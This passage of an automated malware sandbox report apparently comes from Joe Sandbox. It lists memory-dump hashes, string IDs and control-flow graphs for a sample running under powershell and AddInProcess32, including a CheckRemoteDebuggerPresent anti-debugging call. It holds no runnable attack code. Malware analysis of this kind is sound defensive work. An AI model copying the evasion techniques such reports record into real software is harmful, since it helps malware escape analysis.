                    • Opcode ID: 55e50b5a009d3a63793fc4b718611c3505712ba35c9f20c8e2827c6bfe4b9b7f
                    • Instruction ID: 5babc73e816c38c1ef110fdca69bb42199f86eaef02e3bde842934df6d2f4f1a
                    • Opcode Fuzzy Hash: 55e50b5a009d3a63793fc4b718611c3505712ba35c9f20c8e2827c6bfe4b9b7f
                    • Instruction Fuzzy Hash: 20615631B04744CFCB27AA788850B7BBBB69FD1310F2984BAC445DB282DA75CC05C3A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.515969027.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_380000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4:)$4:)$4:)$L4p$L4p$L4p
                    • API String ID: 0-2738816654
                    • Opcode ID: f94aa3ba0ac7aab6aeb785ad3ada058ee57bf62dd98af25b857ce1dee7cb5bc5
                    • Instruction ID: 347e8325e2f086b143a974a037205bfc94c87278c095e9b5cb24bd75ebd065c5
                    • Opcode Fuzzy Hash: f94aa3ba0ac7aab6aeb785ad3ada058ee57bf62dd98af25b857ce1dee7cb5bc5
                    • Instruction Fuzzy Hash: A56149357003449FCF5AAF28C4107AE7BB2EFC4300F1980AAE8558B292DB71DD59CBA1
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.515969027.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_380000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 0U%$tPp$tPp$[f$[f
                    • API String ID: 0-294770267
                    • Opcode ID: 0c8097d952fa104f2feacb2d710d0e69138e5d5907997c101100ef63d8c58d80
                    • Instruction ID: 496c9c47140ba4a35dc254d2a542a9270d52db4e50af81dab6533a4454246701
                    • Opcode Fuzzy Hash: 0c8097d952fa104f2feacb2d710d0e69138e5d5907997c101100ef63d8c58d80
                    • Instruction Fuzzy Hash: C3514A31B043109FDB16AB6DD841B7ABBA6EF85B10F24C4BAE5058F395DA71CE40C761
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.515969027.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_380000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'p$4'p$$p$$p$$p
                    • API String ID: 0-2334450948
                    • Opcode ID: c0d4187927d265b8bfe67c56b59b3f4609fed734308c096f29dc2312d3e273bf
                    • Instruction ID: 42f19adf9315bf9fd817de3a36abb84129c3c86a9fc73f7665cdd102765a0551
                    • Opcode Fuzzy Hash: c0d4187927d265b8bfe67c56b59b3f4609fed734308c096f29dc2312d3e273bf
                    • Instruction Fuzzy Hash: 1041D636701301DBCB2B6A68D8405BAFBAAABC1310F7984EAD8518B255EB75CD43C751
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.515969027.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_380000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: h%f$h%f$$p$$p$$p
                    • API String ID: 0-930881452
                    • Opcode ID: e88f95ac918eea55570c94182a757162b27a4d8a36da22146f5ca306ee3b0123
                    • Instruction ID: eb71d220d8a20520b27070ce60be2abb4121fa8206bb07b48b8bca55fd15c061
                    • Opcode Fuzzy Hash: e88f95ac918eea55570c94182a757162b27a4d8a36da22146f5ca306ee3b0123
                    • Instruction Fuzzy Hash: D631B175B003058FCB26AA6DD4006AAFBE9ABD5311F7984AEE456CB200EB31CD42C791
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.515969027.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_380000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 8V$8V$$p$$p$$p
                    • API String ID: 0-1988449585
                    • Opcode ID: e68683d006a50494a0ee70ccf673696a6a6c10328776a119e95d6fa3e0f65180
                    • Instruction ID: 42d88bdbb1592927f4cd0873f85918446f25bddc82995ec5e6e92e4d0014f780
                    • Opcode Fuzzy Hash: e68683d006a50494a0ee70ccf673696a6a6c10328776a119e95d6fa3e0f65180
                    • Instruction Fuzzy Hash: F52106397003049BDB25656AE81077EB6AA9FC4B10F68846AE489DB384DEF2CE41C361
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.515969027.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_380000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'p$4'p$h%f$h%f
                    • API String ID: 0-3741909733
                    • Opcode ID: 6080a0de76ea20a25c61501ad212977876f38a642b26d34e35331bf9bd1a3e1d
                    • Instruction ID: 7c6144c0b92e6433570920d205ab009ec4a0814cad82da7052dda4e9b3fd0197
                    • Opcode Fuzzy Hash: 6080a0de76ea20a25c61501ad212977876f38a642b26d34e35331bf9bd1a3e1d
                    • Instruction Fuzzy Hash: F941E434B047448FCF2AAAA9D80876ABBB6AFD5310F6984EBC405CF255DB31CD41C791
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.515969027.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_380000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'p$4'p$h%f$h%f
                    • API String ID: 0-3741909733
                    • Opcode ID: 877ca625085ed125f59c9f86d8ef6f4e54de4e39f31476b2116a332dadf579a1
                    • Instruction ID: e6d7407ffefa0127ac16074d3e75e0259f5eb10ee7002386676879eca3c6908a
                    • Opcode Fuzzy Hash: 877ca625085ed125f59c9f86d8ef6f4e54de4e39f31476b2116a332dadf579a1
                    • Instruction Fuzzy Hash: 46310A76B003538BCB2B6668941067BBBB6ABD5321F6980FAC5818FA85DB75CC41C352
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.515969027.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_380000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p$$p$$p$$p
                    • API String ID: 0-3121760203
                    • Opcode ID: e07c67729ebb925282a1ab42c347526cd77917c28be8f9d62a01ad1ac7108236
                    • Instruction ID: 07a33e8e83b9c000c1740ebc4f6413e3ac5d0683af89764df1d223b8077aff99
                    • Opcode Fuzzy Hash: e07c67729ebb925282a1ab42c347526cd77917c28be8f9d62a01ad1ac7108236
                    • Instruction Fuzzy Hash: E82127367007049BDB26696D9C01BABABAA9BC0311F7884BAE559CB281DE71ED41C361
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.515969027.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_380000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'p$4'p$h%f$h%f
                    • API String ID: 0-3741909733
                    • Opcode ID: 19e575ce07f8d0dbb78a52a8a40f0c4b4b44b1d059a9ae4907c895ba3e1ca775
                    • Instruction ID: 606a1428c87f1fb9fba48b43b95697e34f265a726bf5e01bd23603746aab4198
                    • Opcode Fuzzy Hash: 19e575ce07f8d0dbb78a52a8a40f0c4b4b44b1d059a9ae4907c895ba3e1ca775
                    • Instruction Fuzzy Hash: EB212831B043538FCB1F6A6984117A6FBE5AFD0311B3984FAC1828BA44DE75CC52C392

                    Execution Graph

                    Execution Coverage:11%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:100%
                    Total number of Nodes:3
                    Total number of Limit Nodes:0
                    execution_graph 13424 245310 13425 245354 CheckRemoteDebuggerPresent 13424->13425 13426 245396 13425->13426

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 695 471d60-471d7e 696 471d80-471d83 695->696 697 471da6-471da9 696->697 698 471d85-471da1 696->698 699 471dab-471dc5 697->699 700 471dca-471dcd 697->700 698->697 699->700 701 471dcf-471dd9 700->701 702 471dda-471ddd 700->702 705 471df4-471df6 702->705 706 471ddf-471ded 702->706 707 471dfd-471e00 705->707 708 471df8 705->708 712 471e06-471e1c 706->712 713 471def 706->713 707->696 707->712 708->707 715 471e22-471e2b 712->715 716 472038-472042 712->716 713->705 717 472043-47207f 715->717 718 471e31-471e4e 715->718 721 472081-472084 717->721 725 472025-472032 718->725 726 471e54-471e7c 718->726 723 4720a7-4720aa 721->723 724 472086-4720a2 721->724 727 472157-47215a 723->727 728 4720b0-4720bc 723->728 724->723 725->715 725->716 726->725 749 471e82-471e8b 726->749 729 472390-472392 727->729 730 472160-47216f 727->730 735 4720c7-4720c9 728->735 733 472394 729->733 734 472399-47239c 729->734 743 472171-47218c 730->743 744 47218e-4721d2 730->744 733->734 734->721 740 4723a2-4723ab 734->740 738 4720e1-4720e5 735->738 739 4720cb-4720d1 735->739 741 4720e7-4720f1 738->741 742 4720f3 738->742 746 4720d5-4720d7 739->746 747 4720d3 739->747 748 4720f8-4720fa 741->748 742->748 743->744 755 472364-47237a 744->755 756 4721d8-4721e9 744->756 746->738 747->738 750 472111-47214a 748->750 751 4720fc-4720ff 748->751 749->717 753 471e91-471ead 749->753 750->730 775 47214c-472156 750->775 751->740 761 472013-47201f 753->761 762 471eb3-471edd 753->762 755->729 764 47234f-47235e 756->764 765 4721ef-47220c 756->765 761->725 761->749 778 471ee3-471f0b 762->778 779 472009-47200e 762->779 764->755 764->756 765->764 777 472212-472309 765->777 826 472317 777->826 827 47230b-472315 777->827 778->779 785 471f11-471f3f 778->785 779->761 785->779 791 471f45-471f4e 785->791 791->779 793 471f54-471f86 791->793 800 471f91-471fad 793->800 801 471f88-471f8c 793->801 800->761 803 471faf-472007 800->803 801->779 802 471f8e 801->802 802->800 803->761 828 47231c-47231e 826->828 827->828 828->764 829 472320-472325 828->829 830 472327-472331 829->830 831 472333 829->831 832 472338-47233a 830->832 831->832 832->764 833 47233c-472348 832->833 833->764
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.479109392.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_470000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p$$p
                    • API String ID: 0-580715581
                    • Opcode ID: db480dd05e81e2464dc297a70b2407c51b937004548e3f090ee1e5442a36d2e9
                    • Instruction ID: ce279e48ef33bb9531bcc37fb7e666c9ff0284d60c54d590a887a96af738e020
                    • Opcode Fuzzy Hash: db480dd05e81e2464dc297a70b2407c51b937004548e3f090ee1e5442a36d2e9
                    • Instruction Fuzzy Hash: B402CF30B006058FDB15EB64D590BAEB7E2EF84300F64C46AD809EB395DB79ED46CB90

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 968 245310-245394 CheckRemoteDebuggerPresent 970 245396-24539c 968->970 971 24539d-2453d8 968->971 970->971
                    APIs
                    • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 00245387
                    Memory Dump Source
                    • Source File: 00000008.00000002.479065499.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_240000_AddInProcess32.jbxd
                    Similarity
                    • API ID: CheckDebuggerPresentRemote
                    • String ID:
                    • API String ID: 3662101638-0
                    • Opcode ID: b3cc2ee12297bfe203ed4f912d66411e4ff94b9e72508f8fb4550ffa602218f4
                    • Instruction ID: a4ef4574a90cead78324363904f1ded9e3f995dde1c0540844b8c6aabb86dc72
                    • Opcode Fuzzy Hash: b3cc2ee12297bfe203ed4f912d66411e4ff94b9e72508f8fb4550ffa602218f4
                    • Instruction Fuzzy Hash: C82128B18002198FCB00CF9AD484BEEFBF4AF49320F14845AD855A3251D778A944CF61
                    Memory Dump Source
                    • Source File: 00000008.00000002.479109392.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_470000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e289824f0cf61966746981af415371625f36138d9a327bbdf561e5a42716c02e
                    • Instruction ID: 4afbd88ef0ae1f7f79734c37e63ee4b4489d98186d89e06a6d2ac1e335a5913b
                    • Opcode Fuzzy Hash: e289824f0cf61966746981af415371625f36138d9a327bbdf561e5a42716c02e
                    • Instruction Fuzzy Hash: BD628C34B01204DFDB25DB68D594BAEB7F2EF84314F64842AD409AB395DB39ED42CB84

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 135 471070-47108c 136 47108e-471091 135->136 137 4710b4-4710b6 136->137 138 471093-4710af 136->138 139 4710bd-4710c0 137->139 140 4710b8 137->140 138->137 139->136 142 4710c2-4711dd 139->142 140->139 161 4711df-4711e3 142->161 162 4711e9-4711f8 142->162 161->162 163 471656-471660 162->163 164 4711fe-471207 162->164 165 47120d-471218 164->165 166 47164c-471651 164->166 167 471626-471632 165->167 168 47121e-471235 165->168 166->163 167->164 169 471638 167->169 168->167 172 47123b-471244 168->172 169->163 172->166 173 47124a-47126f 172->173 176 471275-47128c 173->176 177 471614-471620 173->177 176->177 179 471292-47129b 176->179 177->167 177->172 179->166 180 4712a1-4712bb 179->180 182 4712c2-4712c4 180->182 183 4712c6-4712d6 182->183 184 47130e-471321 182->184 189 471326-471359 183->189 190 4712d8-4712e8 183->190 185 4715f0-4715f4 184->185 186 4715f6 185->186 187 4715ff-471600 185->187 186->187 187->177 199 47139b-4713ab 189->199 200 47135b-471399 189->200 190->189 194 4712ea-4712fa 190->194 194->189 198 4712fc-47130c 194->198 198->184 198->189 204 4713c3-4713d8 199->204 205 4713ad-4713b3 199->205 210 4713da-471441 200->210 204->210 206 4713b7-4713b9 205->206 207 4713b5 205->207 206->204 207->204 219 471447-47144a 210->219 220 4714f3-471513 210->220 221 4715d1-4715d6 219->221 222 471450-471460 219->222 230 471515-471556 220->230 231 47156b-471577 220->231 229 4715db-4715ee 221->229 226 471466-4714bb 222->226 227 4714e9-4714ed 222->227 226->221 253 4714c1-4714db 226->253 227->219 227->220 229->185 230->221 252 471558-471569 230->252 236 47158f-4715a4 231->236 237 471579-47157f 231->237 244 4715a6-4715cf 236->244 238 471583-471585 237->238 239 471581 237->239 238->236 239->236 244->229 252->244 253->221 257 4714e1-4714e7 253->257 257->220
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.479109392.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_470000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p$$p$$p$$p$$p$$p
                    • API String ID: 0-3402276426
                    • Opcode ID: d72af2630882c2a57684ac2e7189294f34d1bbabfe1232b1c070124b3b6c755e
                    • Instruction ID: 66a9fbb9ccd58c397774a17a62b80b4a3232a805fc4bc797b6d71052e8be3201
                    • Opcode Fuzzy Hash: d72af2630882c2a57684ac2e7189294f34d1bbabfe1232b1c070124b3b6c755e
                    • Instruction Fuzzy Hash: 30F12C30A10204DFDB19EFA8D494AAEB7B2FF84300F648569D8159B3A9DB35DC42CF95

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 835 473136-47316a 836 473190-4731ae 835->836 837 47316c-47318b 835->837 842 4731c6-4731dc 836->842 843 4731b0-4731b8 836->843 837->836 846 4731e7-4731e9 842->846 843->842 847 473201-473272 846->847 848 4731eb-4731f3 846->848 858 473274-473297 847->858 859 47329e-4732ba 847->859 848->847 858->859 864 4732e6-473301 859->864 865 4732bc-4732df 859->865 870 473303-473325 864->870 871 47332c-473347 864->871 865->864 870->871 876 473372-473a71 871->876 877 473349-47336b 871->877 877->876
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.479109392.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_470000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p$$p
                    • API String ID: 0-580715581
                    • Opcode ID: 9648fd14356127692c59a1b9ac4d510e42363eccc4ee230d372c4e56d8513413
                    • Instruction ID: 3b37c1a7886704babf27715081678c0a2fd49c93ed592d1f8f06784f26ae5aae
                    • Opcode Fuzzy Hash: 9648fd14356127692c59a1b9ac4d510e42363eccc4ee230d372c4e56d8513413
                    • Instruction Fuzzy Hash: 9C516135B006069FDB58DF64D9A0BAE73F6EF84300F54846AC81AEB345EB34DD058B95

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 974 474f30-474f49 975 474f4b-474f4e 974->975 976 474f50-474f54 975->976 977 474f5b-474f5e 975->977 978 474f56 976->978 979 474f99-474fa2 976->979 980 474f80-474f83 977->980 981 474f60-474f71 977->981 978->977 984 47507b-475085 979->984 985 474fa8-474fae 979->985 982 474f85-474f8f 980->982 983 474f90-474f93 980->983 1054 474f73 call 474f20 981->1054 1055 474f73 call 474f30 981->1055 983->979 986 475086-475089 983->986 987 474fb4-474fd3 985->987 988 4750c8-4750fd 985->988 990 4750ac-4750ae 986->990 991 47508b-4750a7 986->991 1004 47506c-475075 987->1004 1005 474fd9-475014 987->1005 998 4750ff-475102 988->998 993 4750b5-4750b8 990->993 994 4750b0 990->994 991->990 992 474f79-474f7b 992->980 993->975 997 4750be-4750c7 993->997 994->993 1000 47525e-475261 998->1000 1001 475108-47512e 998->1001 1006 475284-475286 1000->1006 1007 475263-47527f 1000->1007 1019 475135-475163 1001->1019 1004->984 1004->985 1023 475016-475019 1005->1023 1024 47501e-475028 1005->1024 1009 47528d-475290 1006->1009 1010 475288 1006->1010 1007->1006 1009->998 1013 475296-47529f 1009->1013 1010->1009 1033 475165-47516f 1019->1033 1034 4751da-4751fe 1019->1034 1023->997 1024->1004 1028 47502a-47503e 1024->1028 1031 475040-47504a 1028->1031 1032 47504c 1028->1032 1035 475051-475053 1031->1035 1032->1035 1041 475187-4751d8 1033->1041 1042 475171-475177 1033->1042 1043 475200 1034->1043 1044 475208 1034->1044 1037 475055-475058 1035->1037 1038 47505f-47506a 1035->1038 1037->1038 1038->1004 1038->1028 1041->1033 1041->1034 1046 47517b-47517d 1042->1046 1047 475179 1042->1047 1043->1044 1044->1000 1046->1041 1047->1041 1054->992 1055->992
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.479109392.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_470000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: PHp
                    • API String ID: 0-2495607638
                    • Opcode ID: f93878bf8872b9f3e40b58834416d67b3b051c4b0a598c61d457ae16a9719cae
                    • Instruction ID: 93ff0553f4697910cefe7280a05e45d05b5cb4692153ff90927e6b7a1b38371a
                    • Opcode Fuzzy Hash: f93878bf8872b9f3e40b58834416d67b3b051c4b0a598c61d457ae16a9719cae
                    • Instruction Fuzzy Hash: 09812330B005048FDF14AB64E4A43EEB7A6EBC4310F64846AD40ADF346DF79DD428B95

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1160 472050-47207f 1161 472081-472084 1160->1161 1162 4720a7-4720aa 1161->1162 1163 472086-4720a2 1161->1163 1164 472157-47215a 1162->1164 1165 4720b0-4720bc 1162->1165 1163->1162 1166 472390-472392 1164->1166 1167 472160-47216f 1164->1167 1171 4720c7-4720c9 1165->1171 1169 472394 1166->1169 1170 472399-47239c 1166->1170 1179 472171-47218c 1167->1179 1180 47218e-4721d2 1167->1180 1169->1170 1170->1161 1176 4723a2-4723ab 1170->1176 1174 4720e1-4720e5 1171->1174 1175 4720cb-4720d1 1171->1175 1177 4720e7-4720f1 1174->1177 1178 4720f3 1174->1178 1181 4720d5-4720d7 1175->1181 1182 4720d3 1175->1182 1183 4720f8-4720fa 1177->1183 1178->1183 1179->1180 1188 472364-47237a 1180->1188 1189 4721d8-4721e9 1180->1189 1181->1174 1182->1174 1184 472111-47214a 1183->1184 1185 4720fc-4720ff 1183->1185 1184->1167 1203 47214c-472156 1184->1203 1185->1176 1188->1166 1194 47234f-47235e 1189->1194 1195 4721ef-47220c 1189->1195 1194->1188 1194->1189 1195->1194 1204 472212-472309 1195->1204 1227 472317 1204->1227 1228 47230b-472315 1204->1228 1229 47231c-47231e 1227->1229 1228->1229 1229->1194 1230 472320-472325 1229->1230 1231 472327-472331 1230->1231 1232 472333 1230->1232 1233 472338-47233a 1231->1233 1232->1233 1233->1194 1234 47233c-472348 1233->1234 1234->1194
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.479109392.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_470000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p
                    • API String ID: 0-982128392
                    • Opcode ID: 7fb376d11baa8792b5c78501870717959dc7dfc63e5397f67b024b2a4714b535
                    • Instruction ID: a64fb0bef22d599e83e7731221aea442c38b86721af8ab9749f168fd51ebd257
                    • Opcode Fuzzy Hash: 7fb376d11baa8792b5c78501870717959dc7dfc63e5397f67b024b2a4714b535
                    • Instruction Fuzzy Hash: F6115532B102449FCB249A21DA816EEB765FB80310F54846BCE09E7342D6B8DD0AC764
                    Memory Dump Source
                    • Source File: 00000008.00000002.479109392.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_470000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f7721e531f904e69ab06336ae1e54dacc2f16c2b1e9903e6b1df0c51022d62fb
                    • Instruction ID: bd2e4dea247921ca45776a2e889f7b9980ff932ae335d3862a5f9c06c315e39b
                    • Opcode Fuzzy Hash: f7721e531f904e69ab06336ae1e54dacc2f16c2b1e9903e6b1df0c51022d62fb
                    • Instruction Fuzzy Hash: D8811E70A10204CFDB19EF69D594B9EB7B6FF84300F648529D4099B399DB35AC82CF94
                    Memory Dump Source
                    • Source File: 00000008.00000002.479109392.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_470000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e5569453a87fa88f6d75ac94b33511fc6ea480e76d158db033e9d82ae9c0706d
                    • Instruction ID: f8c60827d25f62e2f31b93cda0f13dafb4ae06fde6d79d7fdbe4f7a5f244640d
                    • Opcode Fuzzy Hash: e5569453a87fa88f6d75ac94b33511fc6ea480e76d158db033e9d82ae9c0706d
                    • Instruction Fuzzy Hash: FE21C235B012049FCF14DAA8E590AEEB7B6EF85310F548426D409EB351D735EC458B84
                    Memory Dump Source
                    • Source File: 00000008.00000002.479048791.00000000001BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_1bd000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b7edf18227aa6d1749f6e33160c1c2bb1da09c75aea01a0cd3aecacb6dfc9a59
                    • Instruction ID: c699935095edb3babe4799220904fa2950f9636a9c55358144a30a9bde27ee99
                    • Opcode Fuzzy Hash: b7edf18227aa6d1749f6e33160c1c2bb1da09c75aea01a0cd3aecacb6dfc9a59
                    • Instruction Fuzzy Hash: B721D075604240EFDB19EF14E8C4B66BF61EB84314F34C5A9E8494B246D33AD847CBA1
                    Memory Dump Source
                    • Source File: 00000008.00000002.479109392.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_470000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1f2928df3c748f457b8aace2719fd2a6b73be6318a279dce2314829840aa162f
                    • Instruction ID: 796a818d575cf2117c135c1bcaa74fbfa9a6b8477a37a3bb99954c7eeba15bce
                    • Opcode Fuzzy Hash: 1f2928df3c748f457b8aace2719fd2a6b73be6318a279dce2314829840aa162f
                    • Instruction Fuzzy Hash: E221B334A00209CBDB14EF98D6949EEB7B2FF48315F288116DD19AB265D734AD82CF94
                    Memory Dump Source
                    • Source File: 00000008.00000002.479109392.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_470000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9f594c824b491b783f360de53c5c310a3c38a6628077ed103b5f944550015238
                    • Instruction ID: 334eda15960c16c4e1edd0c4b9cea5fdcee94f5f4f6df2b54c6e85a0f165f274
                    • Opcode Fuzzy Hash: 9f594c824b491b783f360de53c5c310a3c38a6628077ed103b5f944550015238
                    • Instruction Fuzzy Hash: 4D21AF35B012089FDF18DAA8E5907EEB7F6EF85310F54842AE409EB394DB75EC458B84
                    Memory Dump Source
                    • Source File: 00000008.00000002.479048791.00000000001BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_1bd000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cb7fc38e5a72a0ebd0c12c3ad36483bde331a4411de629f73478562dbf70766b
                    • Instruction ID: 8e056e34599176da64eb97b1fd0978b6e49f6f94a6791a27467f425dcd8c24d8
                    • Opcode Fuzzy Hash: cb7fc38e5a72a0ebd0c12c3ad36483bde331a4411de629f73478562dbf70766b
                    • Instruction Fuzzy Hash: 0C217F755083809FCB06DF14D994B11BFB1EB46314F28C5EAD8498F266D33A985ACB62
                    Memory Dump Source
                    • Source File: 00000008.00000002.479109392.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_470000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6259dc434f463b61881708ed791f59e7ddfdca40d85a0b6f56d4f8e6b81fa84e
                    • Instruction ID: 9912bb9db0f6048b1f6f07493984a514d4def391ce9ce464eb8907f4f71f62f5
                    • Opcode Fuzzy Hash: 6259dc434f463b61881708ed791f59e7ddfdca40d85a0b6f56d4f8e6b81fa84e
                    • Instruction Fuzzy Hash: F8014C367105591BD722A639E8113BF7786EFC2360F554C3AE049C7356DB18DD074785
                    Memory Dump Source
                    • Source File: 00000008.00000002.479109392.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_470000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9fc27016b1dba4eecf5193df8ce9f12c2d8e121fa9c806a4ada814d2f9cf57db
                    • Instruction ID: 86e05182599498c1991b68184f02e31ebb0bb3838a904d8879558f003a74755c
                    • Opcode Fuzzy Hash: 9fc27016b1dba4eecf5193df8ce9f12c2d8e121fa9c806a4ada814d2f9cf57db
                    • Instruction Fuzzy Hash: 800181307005145BDB69AA6CD8A0BBF73D9EBC9710F508829E90ECB354DB65DC0283D5
                    Memory Dump Source
                    • Source File: 00000008.00000002.479109392.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_470000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2f40f4316aa1083e2a6d93f03ae0893d44233f3258065171e95d079b9fbb99af
                    • Instruction ID: a4f09d2b2ff5775debc388afd7bbf63b8eb2d5402211bdc6cde9e54c7cd206cc
                    • Opcode Fuzzy Hash: 2f40f4316aa1083e2a6d93f03ae0893d44233f3258065171e95d079b9fbb99af
                    • Instruction Fuzzy Hash: 18F0C839B04104DFDF20DAB4E8947EBB7B5D7C4326F10842AD50AD7245C72898548695
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.479109392.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_470000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p$$p$$p$$p$$p$$p$$p$$p$$p$$p
                    • API String ID: 0-1868313790
                    • Opcode ID: ecffd04703fbc1f6f976c9fe555db04346a50cf0928eab3ddd3e125b48eac43b
                    • Instruction ID: 6e23be2773ffb2712b4a6befce097f209bc4391b55cb74555fa5bb0603da985d
